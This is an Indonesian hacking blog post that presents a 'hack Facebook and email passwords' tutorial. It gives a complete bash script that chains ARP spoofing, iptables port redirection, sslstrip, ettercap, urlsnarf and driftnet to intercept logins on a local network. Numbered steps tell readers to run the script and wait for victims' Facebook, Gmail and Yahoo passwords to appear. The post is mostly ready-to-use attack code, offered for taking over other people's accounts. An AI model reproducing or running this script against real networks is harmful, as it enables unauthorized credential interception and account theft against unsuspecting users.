-=[ Klick Go To My Homepage ]=-














!!Catatan Si Hitam!!
!!http://cekouff.blogspot.com/!!
0

hack menggunakan srcipt...

Minggu, 02 Desember 2012
Share this Article on :
Salah satu tutorial yang paling di cari para pecinta hacking adalah hack password facebook dan email maka dengan kebutuhan yg sangat bnyak saya akan membuat tutorial lengkapnya yaitu dengan cara sniffing menggunakan script menggunakan backtrack4 R2..cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja mamen............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable



Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah mamen, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
# ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:

5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap

mudah kan cara sniffingnya, tapi inget bro jg diacak acak tuh account orang kan dosa......... hacking facebook terasa lebih mudah kan !!

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......


Artikel Terkait:

0 komentar:

Poskan Komentar

Read more: http://blogkomputer12.blogspot.com/2012/06/tips-memasang-widget-untuk-mempercantik.html#ixzz2CsoLdPTs

Blogger news

Column 1

Musik

Pages

Popular Posts